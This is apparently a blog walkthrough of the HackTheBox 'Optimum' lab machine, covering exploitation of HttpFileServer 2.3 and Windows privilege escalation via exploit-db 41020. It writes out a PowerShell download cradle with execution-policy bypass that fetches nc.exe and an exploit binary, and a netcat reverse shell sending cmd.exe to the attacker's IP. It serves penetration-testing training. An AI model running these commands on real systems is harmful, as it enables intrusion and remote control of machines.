![HackTheBox – Optimum Walkthrough HackTheBox – Optimum Walkthrough](https://i.imgur.com/6Wa9nZm.png)
Okay ramping up the difficulty a little. Not another really tough box but this one was done with no metasploit so there was some added complexity.
Mapping the Attack Surface
![](https://i.imgur.com/i9DQuG0.png)
Not a whole lot going on as far as running services. Just a single HTTP server
![](https://i.imgur.com/7beLYVW.png)
This service is interesting. Looks like it’s running HttpFileServer 2.3
When I run nikto we confirm this
![](https://i.imgur.com/jEN8moc.png)
Getting a Shell
So a quick google search later for HFS 2.3 exploit
came back with this exploit-db gem
Don’t forget to crack it open and update the ip and port information
![](https://i.imgur.com/DsxNHP5.png)
If you set it all up correctly (and the box doesn’t need to be reset like mine did) then you should get a shell
![](https://i.imgur.com/58u4soW.png)
It appears that you land as user kostas who is a local non-admin user. So I grab their flag and I move on
![](https://i.imgur.com/kPDBWWe.png)
![](https://i.imgur.com/05Lywtk.png)
Privilege Escalation to Administrator
Next I grab the systeminfo
![](https://i.imgur.com/Vp0MagK.png)
Let’s take this systeminfo output and feed it into the windows-exploit-suggester.py
When using this tool, first make sure to update it in order to download the newest database xls. Then run it against your systeminfo file
![](https://i.imgur.com/I9sKrE8.png)
So I started by running the first exploit in there at the top and it just seemed to jam up my shell. Then I noticed that most commands were jamming up my shell. So what I decided to do what put nc.exe on the machine and send myself a proper cmd.exe reverse shell. This worked waaaaaay better
The commands looks like this
cp /usr/share/windows-binaries/nc.exe /var/www/html
service apache2 start
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadFile("http://10.10.14.20/nc.exe", "C:\Users\kostas\Desktop\nc.exe")
Then I start a netcat listener on 444 and then in my existing shell I run ./nc.exe 10.10.14.20 444 -e cmd.exe
Once I have my new shell I then tried the first exploit in the list again 41015
but still couldn’t get it to work. Then I moved on to the next one 41020
found here https://www.exploit-db.com/exploits/41020/
There’s a link to a precompiled binary in there if you don’t want to try and compile it yourself. This was the route I went with.
Using a simil
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadFile("http://10.10.14.20/41020.exe", "C:\Users\kostas\Desktop\41020.exe")
That’s essentially it!
Once you run that executable you’ll be an Admin on the machine
![](https://i.imgur.com/IMDTeL4.png)